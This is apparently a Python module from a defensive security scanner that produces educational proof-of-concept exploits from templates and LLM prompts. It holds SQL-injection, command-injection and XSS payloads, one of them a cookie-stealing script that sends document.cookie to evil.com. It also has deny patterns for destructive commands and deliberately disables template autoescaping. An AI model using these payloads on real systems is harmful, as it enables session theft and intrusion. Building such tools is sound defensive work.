exploit_generator.py•17 kB
"""Exploit generator for creating proof-of-concept security exploits."""
import json
import re
from dataclasses import dataclass
from typing import Any
from jinja2 import Environment, Template
from ..config import SecurityConfig
from ..credentials import CredentialManager
from .types import Category, ThreatMatch
class ExploitGenerationError(Exception):
"""Exception raised when exploit generation fails."""
pass
@dataclass
class ExploitContext:
"""Context information for exploit generation."""
threat_match: ThreatMatch
source_code: str
additional_context: dict[str, Any] = None
def __post_init__(self):
if self.additional_context is None:
self.additional_context = {}
@dataclass
class ExploitPrompt:
"""Represents a prompt for exploit generation."""
system_prompt: str
user_prompt: str
threat_match: ThreatMatch
source_code: str
def to_dict(self) -> dict[str, Any]:
"""Convert to dictionary for JSON serialization."""
return {
"system_prompt": self.system_prompt,
"user_prompt": self.user_prompt,
"threat_type": self.threat_match.rule_name,
"severity": self.threat_match.severity.value,
"category": self.threat_match.category.value,
"file_path": self.threat_match.file_path,
"line_number": self.threat_match.line_number,
}
class SafetyFilter:
"""Filter to ensure exploits are safe for educational purposes."""
def __init__(self):
self.dangerous_patterns = [
r"rm\s+-rf\s+/",
r"format\s+c:",
r"del\s+/s\s+/q",
r":\(\)\{\s*:\s*\|\s*:\s*&\s*\}\s*;", # Fork bomb
r"while\s*\(\s*1\s*\)", # Infinite loop
r'exec\s*\(\s*["\']rm\s+-rf',
r'subprocess\.call\s*\(\s*["\']rm\s+-rf',
r'os\.system\s*\(\s*["\']rm\s+-rf',
r'eval\s*\(\s*["\'].*rm\s+-rf',
r'shell_exec\s*\(\s*["\']rm\s+-rf',
r'system\s*\(\s*["\']rm\s+-rf',
]
self.compiled_patterns = [
re.compile(pattern, re.IGNORECASE) for pattern in self.dangerous_patterns
]
def is_safe(self, exploit: str) -> bool:
"""Check if an exploit is safe for educational purposes.
Args:
exploit: The exploit string to check
Returns:
True if the exploit is safe, False otherwise
"""
for pattern in self.compiled_patterns:
if pattern.search(exploit):
return False
return True
def sanitize_exploit(self, exploit: str) -> str:
"""Sanitize an exploit to make it safe for educational purposes.
Args:
exploit: The exploit string to sanitize
Returns:
Sanitized exploit string
"""
# Replace dangerous commands with safe alternatives
safe_exploit = exploit
# Replace destructive commands
safe_exploit = re.sub(
r"rm\s+-rf\s+/", 'echo "This would delete files"', safe_exploit
)
safe_exploit = re.sub(
r"format\s+c:", 'echo "This would format drive"', safe_exploit
)
safe_exploit = re.sub(
r"del\s+/s\s+/q", 'echo "This would delete files"', safe_exploit
)
# Add safety warnings
if not safe_exploit.startswith("# WARNING:"):
safe_exploit = (
"# WARNING: This is for educational purposes only!\n" + safe_exploit
)
return safe_exploit
class TemplateEngine:
"""Engine for generating exploits from templates."""
def __init__(self):
# This is intentional for educational exploit generation in a defensive security tool
# deepcode ignore XSS: False positive - this is a defensive security tool that generates
# educational exploits with proper safety warnings and context
# nosemgrep: python.flask.security.xss.audit.direct-use-of-jinja2.direct-use-of-jinja2
self.env = (
Environment()
) # nosec B701 - autoescape disabled intentionally for exploit generation
self.templates = self._load_built_in_templates()
def _load_built_in_templates(self) -> dict[str, Template]:
"""Load built-in exploit templates.
Returns:
Dictionary of template name to Template object
"""
templates = {}
# SQL Injection template
templates["sql_injection"] = self.env.from_string(
"""
# SQL Injection Exploit
# Target: {{ threat.rule_name }}
# Severity: {{ threat.severity.value }}
# Basic SQL injection payload
payload = "' OR '1'='1"
# Union-based injection
union_payload = "' UNION SELECT username, password FROM users--"
# Time-based blind injection
time_payload = "'; WAITFOR DELAY '00:00:05'--"
# Boolean-based blind injection
boolean_payload = "' AND (SELECT COUNT(*) FROM users) > 0--"
# Example usage:
# In the vulnerable code: {{ threat.code_snippet }}
# Replace user input with: {{ payload }}
"""
)
# XSS template
templates["xss"] = self.env.from_string(
"""
# Cross-Site Scripting (XSS) Exploit
# Target: {{ threat.rule_name }}
# Severity: {{ threat.severity.value }}
# Basic XSS payload
payload = "<script>alert('XSS')</script>"
# Cookie stealing payload
cookie_payload = "<script>document.location='http://evil.com/steal.php?cookie='+document.cookie</script>"
# DOM manipulation payload
dom_payload = "<img src='x' onerror='alert(document.domain)'>"
# Example usage:
# In the vulnerable code: {{ threat.code_snippet }}
# Input: {{ payload }}
"""
)
# Command injection template
templates["command_injection"] = self.env.from_string(
"""
# Command Injection Exploit
# Target: {{ threat.rule_name }}
# Severity: {{ threat.severity.value }}
# Basic command injection
payload = "; ls -la"
# Command chaining
chain_payload = " && whoami"
# Safe demonstration payload
safe_payload = "; echo 'Command injection successful'"
# Example usage:
# In the vulnerable code: {{ threat.code_snippet }}
# Input: {{ payload }}
"""
)
return templates
def generate_exploit(
self, threat_match: ThreatMatch, source_code: str
) -> list[str]:
"""Generate exploit from template.
Args:
threat_match: The threat match to generate exploit for
source_code: The vulnerable source code
Returns:
List of exploit strings
"""
exploits = []
# Try to find appropriate template
template_name = self._get_template_name(threat_match.category)
if template_name and template_name in self.templates:
template = self.templates[template_name]
exploit = template.render(threat=threat_match, source_code=source_code)
exploits.append(exploit)
return exploits
def _get_template_name(self, category: Category) -> str | None:
"""Get template name for a threat category.
Args:
category: The threat category
Returns:
Template name or None if not found
"""
category_map = {
Category.INJECTION: "sql_injection",
Category.XSS: "xss",
Category.RCE: "command_injection",
}
return category_map.get(category)
def add_template(self, name: str, template_content: str) -> None:
"""Add a custom template.
Args:
name: Template name
template_content: Template content
"""
self.templates[name] = self.env.from_string(template_content)
class LLMExploitGenerator:
"""LLM-based exploit generator that creates prompts for client LLMs."""
def __init__(self, config: SecurityConfig):
"""Initialize the LLM exploit generator.
Args:
config: Security configuration
"""
self.config = config
def create_exploit_prompt(self, context: ExploitContext) -> ExploitPrompt:
"""Create exploit generation prompt.
Args:
context: Context for exploit generation
Returns:
ExploitPrompt object
"""
system_prompt = self._create_system_prompt()
user_prompt = self._create_user_prompt(context)
return ExploitPrompt(
system_prompt=system_prompt,
user_prompt=user_prompt,
threat_match=context.threat_match,
source_code=context.source_code,
)
def parse_exploit_response(self, response_text: str) -> list[str]:
"""Parse exploit response from LLM.
Args:
response_text: Raw response from LLM
Returns:
List of exploit strings
"""
# Parse multiple exploits if present
exploits = self._parse_exploits(response_text)
return exploits
def _create_system_prompt(self) -> str:
"""Create system prompt for exploit generation.
Returns:
System prompt string
"""
return """You are a cybersecurity expert generating educational proof-of-concept exploits.
Your task is to create safe, educational demonstrations of security vulnerabilities.
Guidelines:
1. Always include warnings about responsible disclosure and legal use only
2. Make exploits safe for demonstration purposes (no actual harm)
3. Focus on educational value and understanding the vulnerability
4. Provide clear explanations of how the exploit works
5. Include remediation advice
6. Use placeholder/example data rather than real sensitive information
7. Avoid destructive commands or operations
8. Add appropriate safety warnings and disclaimers
The exploits should be:
- Safe for educational environments
- Well-documented with comments
- Focused on demonstrating the vulnerability concept
- Include both the exploit and the fix/mitigation"""
def _create_user_prompt(self, context: ExploitContext) -> str:
"""Create user prompt for exploit generation.
Args:
context: Exploit context
Returns:
Formatted prompt string
"""
threat = context.threat_match
prompt = f"""
Generate a proof-of-concept exploit for the following security vulnerability:
**Vulnerability Details:**
- Type: {threat.rule_name}
- Description: {threat.description}
- Category: {threat.category.value}
- Severity: {threat.severity.value}
- File: {threat.file_path}
- Line: {threat.line_number}
**Vulnerable Code:**
```
{context.source_code}
```
**Code Context:**
{threat.code_snippet}
**Requirements:**
1. Generate a safe, educational proof-of-concept exploit
2. Include clear explanations of how the exploit works
3. Provide remediation advice
4. Add appropriate warnings about responsible use
5. Make the exploit safe for demonstration (no actual harm)
**Additional Context:**
{json.dumps(context.additional_context, indent=2)}
Please provide multiple exploit variations if applicable, clearly separated and labeled.
""".strip()
return prompt
def _parse_exploits(self, text: str) -> list[str]:
"""Parse multiple exploits from LLM response.
Args:
text: LLM response text
Returns:
List of individual exploit strings
"""
# Simple parsing - split by code blocks or numbered sections
exploits = []
# Split by code blocks
code_blocks = re.findall(r"```[\s\S]*?```", text)
if code_blocks:
exploits.extend(code_blocks)
# If no code blocks, use the entire text
if not exploits:
exploits = [text]
return exploits
class ExploitGenerator:
"""Main exploit generator combining templates and LLM generation."""
def __init__(self, credential_manager: CredentialManager):
"""Initialize the exploit generator.
Args:
credential_manager: Credential manager for configuration
"""
self.credential_manager = credential_manager
self.config = credential_manager.load_config()
self.template_engine = TemplateEngine()
self.safety_filter = SafetyFilter()
# Initialize LLM generator
self.llm_generator = LLMExploitGenerator(self.config)
def generate_exploits(
self, threat_match: ThreatMatch, source_code: str = "", use_llm: bool = False
) -> list[str]:
"""Generate exploits for a threat match.
Args:
threat_match: The detected threat
source_code: The vulnerable source code
use_llm: Whether to use LLM for generation (now returns prompt instead)
Returns:
List of exploit strings
"""
exploits = []
# Generate from existing templates if available
if threat_match.exploit_examples:
exploits.extend(threat_match.exploit_examples)
# Generate from templates
template_exploits = self._generate_from_templates(threat_match, source_code)
exploits.extend(template_exploits)
# Note: LLM generation is now handled by the server via prompts
# The client will call create_exploit_prompt() separately
# Apply safety filter if enabled
if self.config.exploit_safety_mode:
exploits = [
self.safety_filter.sanitize_exploit(exploit) for exploit in exploits
]
exploits = [
exploit for exploit in exploits if self.safety_filter.is_safe(exploit)
]
return exploits
def create_exploit_prompt(
self, threat_match: ThreatMatch, source_code: str = ""
) -> ExploitPrompt:
"""Create exploit generation prompt for LLM.
Args:
threat_match: The detected threat
source_code: The vulnerable source code
Returns:
ExploitPrompt object
"""
context = ExploitContext(threat_match, source_code)
return self.llm_generator.create_exploit_prompt(context)
def parse_exploit_response(self, response_text: str) -> list[str]:
"""Parse exploit response from LLM.
Args:
response_text: Raw response from LLM
Returns:
List of exploit strings
"""
exploits = self.llm_generator.parse_exploit_response(response_text)
# Apply safety filter if enabled
if self.config.exploit_safety_mode:
exploits = [
self.safety_filter.sanitize_exploit(exploit) for exploit in exploits
]
exploits = [
exploit for exploit in exploits if self.safety_filter.is_safe(exploit)
]
return exploits
def _generate_from_templates(
self, threat_match: ThreatMatch, source_code: str
) -> list[str]:
"""Generate exploits from templates.
Args:
threat_match: The threat match
source_code: The vulnerable source code
Returns:
List of exploit strings
"""
return self.template_engine.generate_exploit(threat_match, source_code)
def add_custom_template(self, name: str, template_content: str) -> None:
"""Add a custom exploit template.
Args:
name: Template name
template_content: Template content
"""
self.template_engine.add_template(name, template_content)
def is_llm_available(self) -> bool:
"""Check if LLM generation is available.
Returns:
True if LLM is available (always true now since we use client LLM)
"""
return True
def get_exploit_metadata(self, threat_match: ThreatMatch) -> dict[str, Any]:
"""Get metadata about possible exploits for a threat.
Args:
threat_match: The detected threat
Returns:
Dictionary with exploit metadata
"""
return {
"category": threat_match.category.value,
"severity": threat_match.severity.value,
"cwe_id": threat_match.cwe_id,
"owasp_category": threat_match.owasp_category,
"available_templates": self._get_available_templates(threat_match.category),
"llm_available": self.is_llm_available(),
"safety_mode": self.config.exploit_safety_mode,
}
def _get_available_templates(self, category: Category) -> list[str]:
"""Get available templates for a category.
Args:
category: Threat category
Returns:
List of available template names
"""
category_templates = {
Category.INJECTION: ["sql_injection", "command_injection"],
Category.XSS: ["xss_dom"],
Category.DESERIALIZATION: ["deserialization"],
Category.LFI: ["path_traversal"],
}
return category_templates.get(category, [])